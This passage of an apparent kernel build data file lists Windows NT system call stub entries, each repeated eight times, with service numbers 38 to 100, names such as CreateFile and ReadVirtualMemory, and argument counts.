SYSSTUBS_ENTRY6 38, AccessCheckAndAuditAlarm, 7
SYSSTUBS_ENTRY7 38, AccessCheckAndAuditAlarm, 7
SYSSTUBS_ENTRY8 38, AccessCheckAndAuditAlarm, 7
SYSSTUBS_ENTRY1 39, UnmapViewOfSection, 0
SYSSTUBS_ENTRY2 39, UnmapViewOfSection, 0
SYSSTUBS_ENTRY3 39, UnmapViewOfSection, 0
SYSSTUBS_ENTRY4 39, UnmapViewOfSection, 0
SYSSTUBS_ENTRY5 39, UnmapViewOfSection, 0
SYSSTUBS_ENTRY6 39, UnmapViewOfSection, 0
SYSSTUBS_ENTRY7 39, UnmapViewOfSection, 0
SYSSTUBS_ENTRY8 39, UnmapViewOfSection, 0
SYSSTUBS_ENTRY1 40, ReplyWaitReceivePortEx, 1
SYSSTUBS_ENTRY2 40, ReplyWaitReceivePortEx, 1
SYSSTUBS_ENTRY3 40, ReplyWaitReceivePortEx, 1
SYSSTUBS_ENTRY4 40, ReplyWaitReceivePortEx, 1
SYSSTUBS_ENTRY5 40, ReplyWaitReceivePortEx, 1
SYSSTUBS_ENTRY6 40, ReplyWaitReceivePortEx, 1
SYSSTUBS_ENTRY7 40, ReplyWaitReceivePortEx, 1
SYSSTUBS_ENTRY8 40, ReplyWaitReceivePortEx, 1
SYSSTUBS_ENTRY1 41, TerminateProcess, 0
SYSSTUBS_ENTRY2 41, TerminateProcess, 0
SYSSTUBS_ENTRY3 41, TerminateProcess, 0
SYSSTUBS_ENTRY4 41, TerminateProcess, 0
SYSSTUBS_ENTRY5 41, TerminateProcess, 0
SYSSTUBS_ENTRY6 41, TerminateProcess, 0
SYSSTUBS_ENTRY7 41, TerminateProcess, 0
SYSSTUBS_ENTRY8 41, TerminateProcess, 0
SYSSTUBS_ENTRY1 42, SetEventBoostPriority, 0
SYSSTUBS_ENTRY2 42, SetEventBoostPriority, 0
SYSSTUBS_ENTRY3 42, SetEventBoostPriority, 0
SYSSTUBS_ENTRY4 42, SetEventBoostPriority, 0
SYSSTUBS_ENTRY5 42, SetEventBoostPriority, 0
SYSSTUBS_ENTRY6 42, SetEventBoostPriority, 0
SYSSTUBS_ENTRY7 42, SetEventBoostPriority, 0
SYSSTUBS_ENTRY8 42, SetEventBoostPriority, 0
SYSSTUBS_ENTRY1 43, ReadFileScatter, 5
SYSSTUBS_ENTRY2 43, ReadFileScatter, 5
SYSSTUBS_ENTRY3 43, ReadFileScatter, 5
SYSSTUBS_ENTRY4 43, ReadFileScatter, 5
SYSSTUBS_ENTRY5 43, ReadFileScatter, 5
SYSSTUBS_ENTRY6 43, ReadFileScatter, 5
SYSSTUBS_ENTRY7 43, ReadFileScatter, 5
SYSSTUBS_ENTRY8 43, ReadFileScatter, 5
SYSSTUBS_ENTRY1 44, OpenThreadTokenEx, 1
SYSSTUBS_ENTRY2 44, OpenThreadTokenEx, 1
SYSSTUBS_ENTRY3 44, OpenThreadTokenEx, 1
SYSSTUBS_ENTRY4 44, OpenThreadTokenEx, 1
SYSSTUBS_ENTRY5 44, OpenThreadTokenEx, 1
SYSSTUBS_ENTRY6 44, OpenThreadTokenEx, 1
SYSSTUBS_ENTRY7 44, OpenThreadTokenEx, 1
SYSSTUBS_ENTRY8 44, OpenThreadTokenEx, 1
SYSSTUBS_ENTRY1 45, OpenProcessTokenEx, 0
SYSSTUBS_ENTRY2 45, OpenProcessTokenEx, 0
SYSSTUBS_ENTRY3 45, OpenProcessTokenEx, 0
SYSSTUBS_ENTRY4 45, OpenProcessTokenEx, 0
SYSSTUBS_ENTRY5 45, OpenProcessTokenEx, 0
SYSSTUBS_ENTRY6 45, OpenProcessTokenEx, 0
SYSSTUBS_ENTRY7 45, OpenProcessTokenEx, 0
SYSSTUBS_ENTRY8 45, OpenProcessTokenEx, 0
SYSSTUBS_ENTRY1 46, QueryPerformanceCounter, 0
SYSSTUBS_ENTRY2 46, QueryPerformanceCounter, 0
SYSSTUBS_ENTRY3 46, QueryPerformanceCounter, 0
SYSSTUBS_ENTRY4 46, QueryPerformanceCounter, 0
SYSSTUBS_ENTRY5 46, QueryPerformanceCounter, 0
SYSSTUBS_ENTRY6 46, QueryPerformanceCounter, 0
SYSSTUBS_ENTRY7 46, QueryPerformanceCounter, 0
SYSSTUBS_ENTRY8 46, QueryPerformanceCounter, 0
SYSSTUBS_ENTRY1 47, EnumerateKey, 2
SYSSTUBS_ENTRY2 47, EnumerateKey, 2
SYSSTUBS_ENTRY3 47, EnumerateKey, 2
SYSSTUBS_ENTRY4 47, EnumerateKey, 2
SYSSTUBS_ENTRY5 47, EnumerateKey, 2
SYSSTUBS_ENTRY6 47, EnumerateKey, 2
SYSSTUBS_ENTRY7 47, EnumerateKey, 2
SYSSTUBS_ENTRY8 47, EnumerateKey, 2
SYSSTUBS_ENTRY1 48, OpenFile, 2
SYSSTUBS_ENTRY2 48, OpenFile, 2
SYSSTUBS_ENTRY3 48, OpenFile, 2
SYSSTUBS_ENTRY4 48, OpenFile, 2
SYSSTUBS_ENTRY5 48, OpenFile, 2
SYSSTUBS_ENTRY6 48, OpenFile, 2
SYSSTUBS_ENTRY7 48, OpenFile, 2
SYSSTUBS_ENTRY8 48, OpenFile, 2
SYSSTUBS_ENTRY1 49, DelayExecution, 0
SYSSTUBS_ENTRY2 49, DelayExecution, 0
SYSSTUBS_ENTRY3 49, DelayExecution, 0
SYSSTUBS_ENTRY4 49, DelayExecution, 0
SYSSTUBS_ENTRY5 49, DelayExecution, 0
SYSSTUBS_ENTRY6 49, DelayExecution, 0
SYSSTUBS_ENTRY7 49, DelayExecution, 0
SYSSTUBS_ENTRY8 49, DelayExecution, 0
SYSSTUBS_ENTRY1 50, QueryDirectoryFile, 7
SYSSTUBS_ENTRY2 50, QueryDirectoryFile, 7
SYSSTUBS_ENTRY3 50, QueryDirectoryFile, 7
SYSSTUBS_ENTRY4 50, QueryDirectoryFile, 7
SYSSTUBS_ENTRY5 50, QueryDirectoryFile, 7
SYSSTUBS_ENTRY6 50, QueryDirectoryFile, 7
SYSSTUBS_ENTRY7 50, QueryDirectoryFile, 7
SYSSTUBS_ENTRY8 50, QueryDirectoryFile, 7
SYSSTUBS_ENTRY1 51, QuerySystemInformation, 0
SYSSTUBS_ENTRY2 51, QuerySystemInformation, 0
SYSSTUBS_ENTRY3 51, QuerySystemInformation, 0
SYSSTUBS_ENTRY4 51, QuerySystemInformation, 0
SYSSTUBS_ENTRY5 51, QuerySystemInformation, 0
SYSSTUBS_ENTRY6 51, QuerySystemInformation, 0
SYSSTUBS_ENTRY7 51, QuerySystemInformation, 0
SYSSTUBS_ENTRY8 51, QuerySystemInformation, 0
SYSSTUBS_ENTRY1 52, OpenSection, 0
SYSSTUBS_ENTRY2 52, OpenSection, 0
SYSSTUBS_ENTRY3 52, OpenSection, 0
SYSSTUBS_ENTRY4 52, OpenSection, 0
SYSSTUBS_ENTRY5 52, OpenSection, 0
SYSSTUBS_ENTRY6 52, OpenSection, 0
SYSSTUBS_ENTRY7 52, OpenSection, 0
SYSSTUBS_ENTRY8 52, OpenSection, 0
SYSSTUBS_ENTRY1 53, QueryTimer, 1
SYSSTUBS_ENTRY2 53, QueryTimer, 1
SYSSTUBS_ENTRY3 53, QueryTimer, 1
SYSSTUBS_ENTRY4 53, QueryTimer, 1
SYSSTUBS_ENTRY5 53, QueryTimer, 1
SYSSTUBS_ENTRY6 53, QueryTimer, 1
SYSSTUBS_ENTRY7 53, QueryTimer, 1
SYSSTUBS_ENTRY8 53, QueryTimer, 1
SYSSTUBS_ENTRY1 54, FsControlFile, 6
SYSSTUBS_ENTRY2 54, FsControlFile, 6
SYSSTUBS_ENTRY3 54, FsControlFile, 6
SYSSTUBS_ENTRY4 54, FsControlFile, 6
SYSSTUBS_ENTRY5 54, FsControlFile, 6
SYSSTUBS_ENTRY6 54, FsControlFile, 6
SYSSTUBS_ENTRY7 54, FsControlFile, 6
SYSSTUBS_ENTRY8 54, FsControlFile, 6
SYSSTUBS_ENTRY1 55, WriteVirtualMemory, 1
SYSSTUBS_ENTRY2 55, WriteVirtualMemory, 1
SYSSTUBS_ENTRY3 55, WriteVirtualMemory, 1
SYSSTUBS_ENTRY4 55, WriteVirtualMemory, 1
SYSSTUBS_ENTRY5 55, WriteVirtualMemory, 1
SYSSTUBS_ENTRY6 55, WriteVirtualMemory, 1
SYSSTUBS_ENTRY7 55, WriteVirtualMemory, 1
SYSSTUBS_ENTRY8 55, WriteVirtualMemory, 1
SYSSTUBS_ENTRY1 56, CloseObjectAuditAlarm, 0
SYSSTUBS_ENTRY2 56, CloseObjectAuditAlarm, 0
SYSSTUBS_ENTRY3 56, CloseObjectAuditAlarm, 0
SYSSTUBS_ENTRY4 56, CloseObjectAuditAlarm, 0
SYSSTUBS_ENTRY5 56, CloseObjectAuditAlarm, 0
SYSSTUBS_ENTRY6 56, CloseObjectAuditAlarm, 0
SYSSTUBS_ENTRY7 56, CloseObjectAuditAlarm, 0
SYSSTUBS_ENTRY8 56, CloseObjectAuditAlarm, 0
SYSSTUBS_ENTRY1 57, DuplicateObject, 3
SYSSTUBS_ENTRY2 57, DuplicateObject, 3
SYSSTUBS_ENTRY3 57, DuplicateObject, 3
SYSSTUBS_ENTRY4 57, DuplicateObject, 3
SYSSTUBS_ENTRY5 57, DuplicateObject, 3
SYSSTUBS_ENTRY6 57, DuplicateObject, 3
SYSSTUBS_ENTRY7 57, DuplicateObject, 3
SYSSTUBS_ENTRY8 57, DuplicateObject, 3
SYSSTUBS_ENTRY1 58, QueryAttributesFile, 0
SYSSTUBS_ENTRY2 58, QueryAttributesFile, 0
SYSSTUBS_ENTRY3 58, QueryAttributesFile, 0
SYSSTUBS_ENTRY4 58, QueryAttributesFile, 0
SYSSTUBS_ENTRY5 58, QueryAttributesFile, 0
SYSSTUBS_ENTRY6 58, QueryAttributesFile, 0
SYSSTUBS_ENTRY7 58, QueryAttributesFile, 0
SYSSTUBS_ENTRY8 58, QueryAttributesFile, 0
SYSSTUBS_ENTRY1 59, ClearEvent, 0
SYSSTUBS_ENTRY2 59, ClearEvent, 0
SYSSTUBS_ENTRY3 59, ClearEvent, 0
SYSSTUBS_ENTRY4 59, ClearEvent, 0
SYSSTUBS_ENTRY5 59, ClearEvent, 0
SYSSTUBS_ENTRY6 59, ClearEvent, 0
SYSSTUBS_ENTRY7 59, ClearEvent, 0
SYSSTUBS_ENTRY8 59, ClearEvent, 0
SYSSTUBS_ENTRY1 60, ReadVirtualMemory, 1
SYSSTUBS_ENTRY2 60, ReadVirtualMemory, 1
SYSSTUBS_ENTRY3 60, ReadVirtualMemory, 1
SYSSTUBS_ENTRY4 60, ReadVirtualMemory, 1
SYSSTUBS_ENTRY5 60, ReadVirtualMemory, 1
SYSSTUBS_ENTRY6 60, ReadVirtualMemory, 1
SYSSTUBS_ENTRY7 60, ReadVirtualMemory, 1
SYSSTUBS_ENTRY8 60, ReadVirtualMemory, 1
SYSSTUBS_ENTRY1 61, OpenEvent, 0
SYSSTUBS_ENTRY2 61, OpenEvent, 0
SYSSTUBS_ENTRY3 61, OpenEvent, 0
SYSSTUBS_ENTRY4 61, OpenEvent, 0
SYSSTUBS_ENTRY5 61, OpenEvent, 0
SYSSTUBS_ENTRY6 61, OpenEvent, 0
SYSSTUBS_ENTRY7 61, OpenEvent, 0
SYSSTUBS_ENTRY8 61, OpenEvent, 0
SYSSTUBS_ENTRY1 62, AdjustPrivilegesToken, 2
SYSSTUBS_ENTRY2 62, AdjustPrivilegesToken, 2
SYSSTUBS_ENTRY3 62, AdjustPrivilegesToken, 2
SYSSTUBS_ENTRY4 62, AdjustPrivilegesToken, 2
SYSSTUBS_ENTRY5 62, AdjustPrivilegesToken, 2
SYSSTUBS_ENTRY6 62, AdjustPrivilegesToken, 2
SYSSTUBS_ENTRY7 62, AdjustPrivilegesToken, 2
SYSSTUBS_ENTRY8 62, AdjustPrivilegesToken, 2
SYSSTUBS_ENTRY1 63, DuplicateToken, 2
SYSSTUBS_ENTRY2 63, DuplicateToken, 2
SYSSTUBS_ENTRY3 63, DuplicateToken, 2
SYSSTUBS_ENTRY4 63, DuplicateToken, 2
SYSSTUBS_ENTRY5 63, DuplicateToken, 2
SYSSTUBS_ENTRY6 63, DuplicateToken, 2
SYSSTUBS_ENTRY7 63, DuplicateToken, 2
SYSSTUBS_ENTRY8 63, DuplicateToken, 2
SYSSTUBS_ENTRY1 64, Continue, 0
SYSSTUBS_ENTRY2 64, Continue, 0
SYSSTUBS_ENTRY3 64, Continue, 0
SYSSTUBS_ENTRY4 64, Continue, 0
SYSSTUBS_ENTRY5 64, Continue, 0
SYSSTUBS_ENTRY6 64, Continue, 0
SYSSTUBS_ENTRY7 64, Continue, 0
SYSSTUBS_ENTRY8 64, Continue, 0
SYSSTUBS_ENTRY1 65, QueryDefaultUILanguage, 0
SYSSTUBS_ENTRY2 65, QueryDefaultUILanguage, 0
SYSSTUBS_ENTRY3 65, QueryDefaultUILanguage, 0
SYSSTUBS_ENTRY4 65, QueryDefaultUILanguage, 0
SYSSTUBS_ENTRY5 65, QueryDefaultUILanguage, 0
SYSSTUBS_ENTRY6 65, QueryDefaultUILanguage, 0
SYSSTUBS_ENTRY7 65, QueryDefaultUILanguage, 0
SYSSTUBS_ENTRY8 65, QueryDefaultUILanguage, 0
SYSSTUBS_ENTRY1 66, QueueApcThread, 1
SYSSTUBS_ENTRY2 66, QueueApcThread, 1
SYSSTUBS_ENTRY3 66, QueueApcThread, 1
SYSSTUBS_ENTRY4 66, QueueApcThread, 1
SYSSTUBS_ENTRY5 66, QueueApcThread, 1
SYSSTUBS_ENTRY6 66, QueueApcThread, 1
SYSSTUBS_ENTRY7 66, QueueApcThread, 1
SYSSTUBS_ENTRY8 66, QueueApcThread, 1
SYSSTUBS_ENTRY1 67, YieldExecution, 0
SYSSTUBS_ENTRY2 67, YieldExecution, 0
SYSSTUBS_ENTRY3 67, YieldExecution, 0
SYSSTUBS_ENTRY4 67, YieldExecution, 0
SYSSTUBS_ENTRY5 67, YieldExecution, 0
SYSSTUBS_ENTRY6 67, YieldExecution, 0
SYSSTUBS_ENTRY7 67, YieldExecution, 0
SYSSTUBS_ENTRY8 67, YieldExecution, 0
SYSSTUBS_ENTRY1 68, AddAtom, 0
SYSSTUBS_ENTRY2 68, AddAtom, 0
SYSSTUBS_ENTRY3 68, AddAtom, 0
SYSSTUBS_ENTRY4 68, AddAtom, 0
SYSSTUBS_ENTRY5 68, AddAtom, 0
SYSSTUBS_ENTRY6 68, AddAtom, 0
SYSSTUBS_ENTRY7 68, AddAtom, 0
SYSSTUBS_ENTRY8 68, AddAtom, 0
SYSSTUBS_ENTRY1 69, CreateEvent, 1
SYSSTUBS_ENTRY2 69, CreateEvent, 1
SYSSTUBS_ENTRY3 69, CreateEvent, 1
SYSSTUBS_ENTRY4 69, CreateEvent, 1
SYSSTUBS_ENTRY5 69, CreateEvent, 1
SYSSTUBS_ENTRY6 69, CreateEvent, 1
SYSSTUBS_ENTRY7 69, CreateEvent, 1
SYSSTUBS_ENTRY8 69, CreateEvent, 1
SYSSTUBS_ENTRY1 70, QueryVolumeInformationFile, 1
SYSSTUBS_ENTRY2 70, QueryVolumeInformationFile, 1
SYSSTUBS_ENTRY3 70, QueryVolumeInformationFile, 1
SYSSTUBS_ENTRY4 70, QueryVolumeInformationFile, 1
SYSSTUBS_ENTRY5 70, QueryVolumeInformationFile, 1
SYSSTUBS_ENTRY6 70, QueryVolumeInformationFile, 1
SYSSTUBS_ENTRY7 70, QueryVolumeInformationFile, 1
SYSSTUBS_ENTRY8 70, QueryVolumeInformationFile, 1
SYSSTUBS_ENTRY1 71, CreateSection, 3
SYSSTUBS_ENTRY2 71, CreateSection, 3
SYSSTUBS_ENTRY3 71, CreateSection, 3
SYSSTUBS_ENTRY4 71, CreateSection, 3
SYSSTUBS_ENTRY5 71, CreateSection, 3
SYSSTUBS_ENTRY6 71, CreateSection, 3
SYSSTUBS_ENTRY7 71, CreateSection, 3
SYSSTUBS_ENTRY8 71, CreateSection, 3
SYSSTUBS_ENTRY1 72, FlushBuffersFile, 0
SYSSTUBS_ENTRY2 72, FlushBuffersFile, 0
SYSSTUBS_ENTRY3 72, FlushBuffersFile, 0
SYSSTUBS_ENTRY4 72, FlushBuffersFile, 0
SYSSTUBS_ENTRY5 72, FlushBuffersFile, 0
SYSSTUBS_ENTRY6 72, FlushBuffersFile, 0
SYSSTUBS_ENTRY7 72, FlushBuffersFile, 0
SYSSTUBS_ENTRY8 72, FlushBuffersFile, 0
SYSSTUBS_ENTRY1 73, ApphelpCacheControl, 0
SYSSTUBS_ENTRY2 73, ApphelpCacheControl, 0
SYSSTUBS_ENTRY3 73, ApphelpCacheControl, 0
SYSSTUBS_ENTRY4 73, ApphelpCacheControl, 0
SYSSTUBS_ENTRY5 73, ApphelpCacheControl, 0
SYSSTUBS_ENTRY6 73, ApphelpCacheControl, 0
SYSSTUBS_ENTRY7 73, ApphelpCacheControl, 0
SYSSTUBS_ENTRY8 73, ApphelpCacheControl, 0
SYSSTUBS_ENTRY1 74, CreateProcessEx, 5
SYSSTUBS_ENTRY2 74, CreateProcessEx, 5
SYSSTUBS_ENTRY3 74, CreateProcessEx, 5
SYSSTUBS_ENTRY4 74, CreateProcessEx, 5
SYSSTUBS_ENTRY5 74, CreateProcessEx, 5
SYSSTUBS_ENTRY6 74, CreateProcessEx, 5
SYSSTUBS_ENTRY7 74, CreateProcessEx, 5
SYSSTUBS_ENTRY8 74, CreateProcessEx, 5
SYSSTUBS_ENTRY1 75, CreateThread, 4
SYSSTUBS_ENTRY2 75, CreateThread, 4
SYSSTUBS_ENTRY3 75, CreateThread, 4
SYSSTUBS_ENTRY4 75, CreateThread, 4
SYSSTUBS_ENTRY5 75, CreateThread, 4
SYSSTUBS_ENTRY6 75, CreateThread, 4
SYSSTUBS_ENTRY7 75, CreateThread, 4
SYSSTUBS_ENTRY8 75, CreateThread, 4
SYSSTUBS_ENTRY1 76, IsProcessInJob, 0
SYSSTUBS_ENTRY2 76, IsProcessInJob, 0
SYSSTUBS_ENTRY3 76, IsProcessInJob, 0
SYSSTUBS_ENTRY4 76, IsProcessInJob, 0
SYSSTUBS_ENTRY5 76, IsProcessInJob, 0
SYSSTUBS_ENTRY6 76, IsProcessInJob, 0
SYSSTUBS_ENTRY7 76, IsProcessInJob, 0
SYSSTUBS_ENTRY8 76, IsProcessInJob, 0
SYSSTUBS_ENTRY1 77, ProtectVirtualMemory, 1
SYSSTUBS_ENTRY2 77, ProtectVirtualMemory, 1
SYSSTUBS_ENTRY3 77, ProtectVirtualMemory, 1
SYSSTUBS_ENTRY4 77, ProtectVirtualMemory, 1
SYSSTUBS_ENTRY5 77, ProtectVirtualMemory, 1
SYSSTUBS_ENTRY6 77, ProtectVirtualMemory, 1
SYSSTUBS_ENTRY7 77, ProtectVirtualMemory, 1
SYSSTUBS_ENTRY8 77, ProtectVirtualMemory, 1
SYSSTUBS_ENTRY1 78, QuerySection, 1
SYSSTUBS_ENTRY2 78, QuerySection, 1
SYSSTUBS_ENTRY3 78, QuerySection, 1
SYSSTUBS_ENTRY4 78, QuerySection, 1
SYSSTUBS_ENTRY5 78, QuerySection, 1
SYSSTUBS_ENTRY6 78, QuerySection, 1
SYSSTUBS_ENTRY7 78, QuerySection, 1
SYSSTUBS_ENTRY8 78, QuerySection, 1
SYSSTUBS_ENTRY1 79, ResumeThread, 0
SYSSTUBS_ENTRY2 79, ResumeThread, 0
SYSSTUBS_ENTRY3 79, ResumeThread, 0
SYSSTUBS_ENTRY4 79, ResumeThread, 0
SYSSTUBS_ENTRY5 79, ResumeThread, 0
SYSSTUBS_ENTRY6 79, ResumeThread, 0
SYSSTUBS_ENTRY7 79, ResumeThread, 0
SYSSTUBS_ENTRY8 79, ResumeThread, 0
SYSSTUBS_ENTRY1 80, TerminateThread, 0
SYSSTUBS_ENTRY2 80, TerminateThread, 0
SYSSTUBS_ENTRY3 80, TerminateThread, 0
SYSSTUBS_ENTRY4 80, TerminateThread, 0
SYSSTUBS_ENTRY5 80, TerminateThread, 0
SYSSTUBS_ENTRY6 80, TerminateThread, 0
SYSSTUBS_ENTRY7 80, TerminateThread, 0
SYSSTUBS_ENTRY8 80, TerminateThread, 0
SYSSTUBS_ENTRY1 81, ReadRequestData, 2
SYSSTUBS_ENTRY2 81, ReadRequestData, 2
SYSSTUBS_ENTRY3 81, ReadRequestData, 2
SYSSTUBS_ENTRY4 81, ReadRequestData, 2
SYSSTUBS_ENTRY5 81, ReadRequestData, 2
SYSSTUBS_ENTRY6 81, ReadRequestData, 2
SYSSTUBS_ENTRY7 81, ReadRequestData, 2
SYSSTUBS_ENTRY8 81, ReadRequestData, 2
SYSSTUBS_ENTRY1 82, CreateFile, 7
SYSSTUBS_ENTRY2 82, CreateFile, 7
SYSSTUBS_ENTRY3 82, CreateFile, 7
SYSSTUBS_ENTRY4 82, CreateFile, 7
SYSSTUBS_ENTRY5 82, CreateFile, 7
SYSSTUBS_ENTRY6 82, CreateFile, 7
SYSSTUBS_ENTRY7 82, CreateFile, 7
SYSSTUBS_ENTRY8 82, CreateFile, 7
SYSSTUBS_ENTRY1 83, QueryEvent, 1
SYSSTUBS_ENTRY2 83, QueryEvent, 1
SYSSTUBS_ENTRY3 83, QueryEvent, 1
SYSSTUBS_ENTRY4 83, QueryEvent, 1
SYSSTUBS_ENTRY5 83, QueryEvent, 1
SYSSTUBS_ENTRY6 83, QueryEvent, 1
SYSSTUBS_ENTRY7 83, QueryEvent, 1
SYSSTUBS_ENTRY8 83, QueryEvent, 1
SYSSTUBS_ENTRY1 84, WriteRequestData, 2
SYSSTUBS_ENTRY2 84, WriteRequestData, 2
SYSSTUBS_ENTRY3 84, WriteRequestData, 2
SYSSTUBS_ENTRY4 84, WriteRequestData, 2
SYSSTUBS_ENTRY5 84, WriteRequestData, 2
SYSSTUBS_ENTRY6 84, WriteRequestData, 2
SYSSTUBS_ENTRY7 84, WriteRequestData, 2
SYSSTUBS_ENTRY8 84, WriteRequestData, 2
SYSSTUBS_ENTRY1 85, OpenDirectoryObject, 0
SYSSTUBS_ENTRY2 85, OpenDirectoryObject, 0
SYSSTUBS_ENTRY3 85, OpenDirectoryObject, 0
SYSSTUBS_ENTRY4 85, OpenDirectoryObject, 0
SYSSTUBS_ENTRY5 85, OpenDirectoryObject, 0
SYSSTUBS_ENTRY6 85, OpenDirectoryObject, 0
SYSSTUBS_ENTRY7 85, OpenDirectoryObject, 0
SYSSTUBS_ENTRY8 85, OpenDirectoryObject, 0
SYSSTUBS_ENTRY1 86, AccessCheckByTypeAndAuditAlarm, 12
SYSSTUBS_ENTRY2 86, AccessCheckByTypeAndAuditAlarm, 12
SYSSTUBS_ENTRY3 86, AccessCheckByTypeAndAuditAlarm, 12
SYSSTUBS_ENTRY4 86, AccessCheckByTypeAndAuditAlarm, 12
SYSSTUBS_ENTRY5 86, AccessCheckByTypeAndAuditAlarm, 12
SYSSTUBS_ENTRY6 86, AccessCheckByTypeAndAuditAlarm, 12
SYSSTUBS_ENTRY7 86, AccessCheckByTypeAndAuditAlarm, 12
SYSSTUBS_ENTRY8 86, AccessCheckByTypeAndAuditAlarm, 12
SYSSTUBS_ENTRY1 87, QuerySystemTime, 0
SYSSTUBS_ENTRY2 87, QuerySystemTime, 0
SYSSTUBS_ENTRY3 87, QuerySystemTime, 0
SYSSTUBS_ENTRY4 87, QuerySystemTime, 0
SYSSTUBS_ENTRY5 87, QuerySystemTime, 0
SYSSTUBS_ENTRY6 87, QuerySystemTime, 0
SYSSTUBS_ENTRY7 87, QuerySystemTime, 0
SYSSTUBS_ENTRY8 87, QuerySystemTime, 0
SYSSTUBS_ENTRY1 88, WaitForMultipleObjects, 1
SYSSTUBS_ENTRY2 88, WaitForMultipleObjects, 1
SYSSTUBS_ENTRY3 88, WaitForMultipleObjects, 1
SYSSTUBS_ENTRY4 88, WaitForMultipleObjects, 1
SYSSTUBS_ENTRY5 88, WaitForMultipleObjects, 1
SYSSTUBS_ENTRY6 88, WaitForMultipleObjects, 1
SYSSTUBS_ENTRY7 88, WaitForMultipleObjects, 1
SYSSTUBS_ENTRY8 88, WaitForMultipleObjects, 1
SYSSTUBS_ENTRY1 89, SetInformationObject, 0
SYSSTUBS_ENTRY2 89, SetInformationObject, 0
SYSSTUBS_ENTRY3 89, SetInformationObject, 0
SYSSTUBS_ENTRY4 89, SetInformationObject, 0
SYSSTUBS_ENTRY5 89, SetInformationObject, 0
SYSSTUBS_ENTRY6 89, SetInformationObject, 0
SYSSTUBS_ENTRY7 89, SetInformationObject, 0
SYSSTUBS_ENTRY8 89, SetInformationObject, 0
SYSSTUBS_ENTRY1 90, CancelIoFile, 0
SYSSTUBS_ENTRY2 90, CancelIoFile, 0
SYSSTUBS_ENTRY3 90, CancelIoFile, 0
SYSSTUBS_ENTRY4 90, CancelIoFile, 0
SYSSTUBS_ENTRY5 90, CancelIoFile, 0
SYSSTUBS_ENTRY6 90, CancelIoFile, 0
SYSSTUBS_ENTRY7 90, CancelIoFile, 0
SYSSTUBS_ENTRY8 90, CancelIoFile, 0
SYSSTUBS_ENTRY1 91, TraceEvent, 0
SYSSTUBS_ENTRY2 91, TraceEvent, 0
SYSSTUBS_ENTRY3 91, TraceEvent, 0
SYSSTUBS_ENTRY4 91, TraceEvent, 0
SYSSTUBS_ENTRY5 91, TraceEvent, 0
SYSSTUBS_ENTRY6 91, TraceEvent, 0
SYSSTUBS_ENTRY7 91, TraceEvent, 0
SYSSTUBS_ENTRY8 91, TraceEvent, 0
SYSSTUBS_ENTRY1 92, PowerInformation, 1
SYSSTUBS_ENTRY2 92, PowerInformation, 1
SYSSTUBS_ENTRY3 92, PowerInformation, 1
SYSSTUBS_ENTRY4 92, PowerInformation, 1
SYSSTUBS_ENTRY5 92, PowerInformation, 1
SYSSTUBS_ENTRY6 92, PowerInformation, 1
SYSSTUBS_ENTRY7 92, PowerInformation, 1
SYSSTUBS_ENTRY8 92, PowerInformation, 1
SYSSTUBS_ENTRY1 93, SetValueKey, 2
SYSSTUBS_ENTRY2 93, SetValueKey, 2
SYSSTUBS_ENTRY3 93, SetValueKey, 2
SYSSTUBS_ENTRY4 93, SetValueKey, 2
SYSSTUBS_ENTRY5 93, SetValueKey, 2
SYSSTUBS_ENTRY6 93, SetValueKey, 2
SYSSTUBS_ENTRY7 93, SetValueKey, 2
SYSSTUBS_ENTRY8 93, SetValueKey, 2
SYSSTUBS_ENTRY1 94, CancelTimer, 0
SYSSTUBS_ENTRY2 94, CancelTimer, 0
SYSSTUBS_ENTRY3 94, CancelTimer, 0
SYSSTUBS_ENTRY4 94, CancelTimer, 0
SYSSTUBS_ENTRY5 94, CancelTimer, 0
SYSSTUBS_ENTRY6 94, CancelTimer, 0
SYSSTUBS_ENTRY7 94, CancelTimer, 0
SYSSTUBS_ENTRY8 94, CancelTimer, 0
SYSSTUBS_ENTRY1 95, SetTimer, 3
SYSSTUBS_ENTRY2 95, SetTimer, 3
SYSSTUBS_ENTRY3 95, SetTimer, 3
SYSSTUBS_ENTRY4 95, SetTimer, 3
SYSSTUBS_ENTRY5 95, SetTimer, 3
SYSSTUBS_ENTRY6 95, SetTimer, 3
SYSSTUBS_ENTRY7 95, SetTimer, 3
SYSSTUBS_ENTRY8 95, SetTimer, 3
SYSSTUBS_ENTRY1 96, AcceptConnectPort, 2
SYSSTUBS_ENTRY2 96, AcceptConnectPort, 2
SYSSTUBS_ENTRY3 96, AcceptConnectPort, 2
SYSSTUBS_ENTRY4 96, AcceptConnectPort, 2
SYSSTUBS_ENTRY5 96, AcceptConnectPort, 2
SYSSTUBS_ENTRY6 96, AcceptConnectPort, 2
SYSSTUBS_ENTRY7 96, AcceptConnectPort, 2
SYSSTUBS_ENTRY8 96, AcceptConnectPort, 2
SYSSTUBS_ENTRY1 97, AccessCheck, 4
SYSSTUBS_ENTRY2 97, AccessCheck, 4
SYSSTUBS_ENTRY3 97, AccessCheck, 4
SYSSTUBS_ENTRY4 97, AccessCheck, 4
SYSSTUBS_ENTRY5 97, AccessCheck, 4
SYSSTUBS_ENTRY6 97, AccessCheck, 4
SYSSTUBS_ENTRY7 97, AccessCheck, 4
SYSSTUBS_ENTRY8 97, AccessCheck, 4
SYSSTUBS_ENTRY1 98, AccessCheckByType, 7
SYSSTUBS_ENTRY2 98, AccessCheckByType, 7
SYSSTUBS_ENTRY3 98, AccessCheckByType, 7
SYSSTUBS_ENTRY4 98, AccessCheckByType, 7
SYSSTUBS_ENTRY5 98, AccessCheckByType, 7
SYSSTUBS_ENTRY6 98, AccessCheckByType, 7
SYSSTUBS_ENTRY7 98, AccessCheckByType, 7
SYSSTUBS_ENTRY8 98, AccessCheckByType, 7
SYSSTUBS_ENTRY1 99, AccessCheckByTypeResultList, 7
SYSSTUBS_ENTRY2 99, AccessCheckByTypeResultList, 7
SYSSTUBS_ENTRY3 99, AccessCheckByTypeResultList, 7
SYSSTUBS_ENTRY4 99, AccessCheckByTypeResultList, 7
SYSSTUBS_ENTRY5 99, AccessCheckByTypeResultList, 7
SYSSTUBS_ENTRY6 99, AccessCheckByTypeResultList, 7
SYSSTUBS_ENTRY7 99, AccessCheckByTypeResultList, 7
SYSSTUBS_ENTRY8 99, AccessCheckByTypeResultList, 7
SYSSTUBS_ENTRY1 100, AccessCheckByTypeResultListAndAuditAlarm, 12
SYSSTUBS_ENTRY2 100, AccessCheckByTypeResultListAndAuditAlarm, 12
SYSSTUBS_ENTRY3 100, AccessCheckByTypeResultListAndAuditAlarm, 12
SYSSTUBS_ENTRY4 100, AccessCheckByTypeResultListAndAuditAlarm, 12
